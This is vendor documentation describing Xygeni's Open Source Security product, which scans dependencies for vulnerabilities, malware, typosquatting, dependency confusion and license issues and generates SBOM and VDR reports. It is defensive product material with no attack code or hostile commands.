Open Source Security (OSS)

OSS Overview

Open Source Security offers real-time monitoring of your dependencies to detect and mitigate threats before they impact your software.

Recent reports reveal that nearly three-quarters of codebases now contain high-risk open-source components. Vulnerabilities have soared from 48% to 74% in just one year. Even more concerning, 91% of these components are at least 10 versions outdated, significantly heightening security risks. The rise of malicious open-source packages has been meteoric, with growth rates exceeding 300% year-over-year, resulting in over 245K malicious packages detected in 2023. It’s time to take action against these threats.

Given these challenges, Xygeni’s Open Source Security solution is essential. It scans and blocks harmful packages upon publication, dramatically reducing the risk of malware and vulnerabilities infiltrating your systems. This comprehensive monitoring spans multiple public registries, ensuring all dependencies are scrutinized for safety and integrity. Xygeni also enhances your team’s ability to maintain secure and reliable software projects by contextually prioritizing critical issues and facilitating streamlined remediation processes

Xygeni Open Source Security is designed to provide complete protection against vulnerabilities and malicious code, ensuring your applications remain secure and resilient. With a robust suite of capabilities, Xygeni offers unparalleled visibility and control over your open-source components, helping you to manage risks effectively.

  1. Comprehensive Component Identification and cataloging of each open-source component within your software projects.

  2. Continuous Scanning and Vulnerability Management to ensure that every component, whether direct, indirect, or undeclared, is assessed for security vulnerabilities, maintenance issues, and licensing compliance.

  3. Context-aware prioritization based on their severity, exploitability, and potential business impact. This context-aware approach ensures that your security and development teams focus on the most critical issues.

  4. Expanded Security Beyond CVEs by incorporating additional risk factors beyond just CVSS scores. Xygeni prevents the integration of packages that may be CVE-free but still risky.

  5. License Risk Management with instant visibility into potential open-source license issues, helping your team avoid legal complications and ensure regulatory compliance.

  6. The one-click generation of SBOM and VDR in SPDX or CycloneDX formats ensures that your software components are transparent and compliant with regulatory requirements.

Comprehensive Component Identification

At the heart of Xygeni’s Open Source Security is our advanced capability to precisely identify and catalog every open-source component in your software projects. This thorough approach provides complete visibility into your software’s architecture, enabling a detailed assessment of your project’s security posture and compliance status. Your team can make better decisions by understanding exactly what makes up your software.

Strategic Approach for Risk Prioritization with ASPM

Xygeni’s software security platform excels in identifying and prioritizing vulnerabilities that pose the most significant risks to your software projects. By systematically analyzing the severity and potential impact of each identified vulnerability, Xygeni enables organizations to focus their resources on mitigating the most critical issues first. Our prioritization is driven by a combination of factors such as vulnerability severity, exploitability, exposure, the potential impact on business operations, and any other custom property defined by customers. Some key features of Xygeni’s prioritization process are:

  1. Continuous Scanning: Xygeni assesses each vulnerability based on its severity and the affected component’s context. This approach ensures that vulnerabilities are not just evaluated in isolation but are considered within the broader scope of the system’s architecture.

  2. Context-Aware Prioritization: Understanding that not all vulnerabilities are created equal, Xygeni prioritizes issues based on their operational and strategic impact. This means vulnerabilities that could lead to significant security breaches are flagged and addressed first.

  3. Customizable Risk Metrics: Xygeni allows organizations to customize how risks are scored and prioritized, aligning the prioritization process with their specific security policies and compliance requirements. This customization capability ensures that the security efforts perfectly sync with organizational priorities and risk

Malware Early Detection, Blocking, and Notification

As soon as new packages are published, Xygeni conducts a real-time scan to detect and block malware based on code behavior analysis, alleviating the need for extensive and urgent post-build remediation. Our systematic process sounds like this:

Continuous Scanning:

  • Public Registries Monitored: The service continuously scans multiple public registries like NPM, Maven, PyPI, etc.

  • Immediate Notification to Affected Users: As soon as a potential threat is detected, the system immediately notifies the affected users, enabling rapid response to mitigate risks. Notifications can be raised through standard Xygeni mechanisms such as email, messaging platforms, and webhooks.

Quarantine:

  • Automatic Blocking of Zero-Day Malware: Upon detection, suspicious packages are automatically quarantined. The customer can use this information to implement guardrails in their CI/CD to prevent the packages from entering the development environment or the broader software supply chain.

Review and Confirmation:

  • Code Review by Security Researchers: A security research team reviews the quarantined package to verify the threat.

  • Confirmation by Public Registry: If confirmed by our internal team, we communicate it to the public registry, which should confirm the finding and validate the threat level and the nature of the malware or vulnerability.

Disposal and Public Disclosure:

  • Disposal: Once a threat is confirmed, the appropriate measures are taken to dispose of the threat safely, ensuring it does not re-enter the ecosystem.

  • Public Disclosure: The usual details about the malware and its disposal are publicly disclosed through the product, Xygeni blog, or the package registry to inform the wider community and prevent

Simplify Open Source Licensing

Xygeni makes navigating the complexities of opensource licensing easy. Our scanning capabilities assess each component’s license, helping your team avoid legal issues and ensure compliance with both organizational policies and external regulations. With Xygeni, you can confidently use open-source software, knowing that all licensing requirements are met.

Keep Your Software Updated and Secure

Xygeni actively monitors and identifies outdated or obsolete components in your software projects. By ensuring your projects always utilize the latest and most secure versions, Xygeni not only reduces potential security risks but also boosts software performance and compatibility.

Advanced Detection of Suspect Dependencies

Xygeni’s Suspect Dependencies Scanner is crucial for identifying and managing suspect dependencies that could be targets for supply-chain attacks. By analyzing the dependency graph, our product can detect issues such as typo-squatting, dependency confusion, and suspicious installation scripts that may indicate a compromise. If a component is recognized as suspicious, Xygeni provides detailed mitigation and remediation strategies to help safely remove or isolate the threat. This includes recommendations for version pinning, using whitelisted components, and blocking suspicious installation scripts.

Optimized and Accelerated Remediation Workflows

Prioritizing vulnerabilities that pose the highest risk ensures that remediation efforts are concentrated where they are most needed, optimizing resource allocation and reducing the time and effort spent on lower-risk vulnerabilities. Moreover, Xygeni simplifies the remediation of open-source vulnerabilities by integrating directly into developers’ existing workflows and issue-tracking systems. This seamless integration provides all the necessary context for each vulnerability right within the tools developers already use, facilitating efficient and effective remediation.

Enhance Transparency and Compliance with SBOM and VDR Generation

Xygeni Open Source Security empowers organizations to maintain complete transparency over their software components with our SBOM generation feature. SBOM facilitates compliance with regulatory requirements and enhances supply chain security by providing a detailed inventory of all software dependencies. Additionally, our Vulnerability Disclosure Report (VDR) generation capability ensures that all stakeholders know potential vulnerabilities, enabling proactive risk management and reinforcing trust throughout the development lifecycle.

Effective Vulnerability Management

Xygeni enhances your software’s security by continuously scanning and analyzing open-source components for vulnerabilities. By connecting directly with the National Vulnerability Database (NVD), other vertical vulnerabilities databases and security advisories, and using Common Vulnerabilities and Exposures (CVE) information, Xygeni ensures fast and accurate detection of potential security issues to protect your software applications promptly and efficiently.

Overview of Supported Package Managers

Xygeni provides a comprehensive range of detectors tailored to the unique characteristics of various software package managers, ensuring comprehensive coverage and precise detection of dependencies.

Please visit Supported Package Managers for Dependency Resolution Analyzers for a full description of supported package managers.

Types of Suspect Dependency Detector

Open Source Security provides a comprehensive range of detectors tailored to the unique characteristics of various software ecosystems, ensuring comprehensive coverage and precise detection of suspect dependencies, among others : maven, PyPi, NPM, nugget, etc. See Open Source Analyzers for a complete list.

  • Anomalous Dependencies: Identifies unusual or unexpected dependencies within the context of the project, which may signal a security concern.

  • Dependency Confusion: This feature detects cases where internal package names may be confused with similarly named packages from public repositories, potentially leading to security breaches.

  • Known Vulnerabilities: Flags dependencies that contain recognized security vulnerabilities.

  • Malware: Looks for dependencies known to contain malware, providing critical security alerts to prevent potential harm.

  • Suspicious Scripts: Monitors for scripts within dependencies that might perform unauthorized or harmful actions.

  • Typosquatting: Aims to catch potentially malicious typosquatting attempts where package names are slightly altered to trick users into installing them.

  • Unscoped Internal Components: This is a special detector for NPM that identifies unscoped internal components and thus might be at risk of being publicly exposed or confused with external packages

To accomplish these functionalities, Xygeni provides a Scanner (to search for dependencies and security issues) and a Web UI to view the results.

See Scan with Xygeni CLI and, more specifically, Dependency Scanner and Suspect Dependencies Scanner for instructions on how to execute an Open Source scan.

SBOM and VDR capabilities

In response to growing cybersecurity threats, regulatory bodies worldwide are increasingly mandating using Software Bill of Materials (SBOMs). SBOMs provide essential visibility into the components of software applications, facilitating better vulnerability management and compliance with security standards.

Analyzers

Dependencies for each ecosystem are processed by a specific analyzer. The analyzer process dependencies descriptors to extract direct and indirect dependencies, resolve their versions, and gather context information like licensing, provenance and other metadata.

See Scan with Xygeni CLI and, more specifically, Dependency Scanner and Suspect Dependencies Scanner for instructions on how to execute an Open Source scan.

See Malware Detection and Malware Early Warning Service

Last updated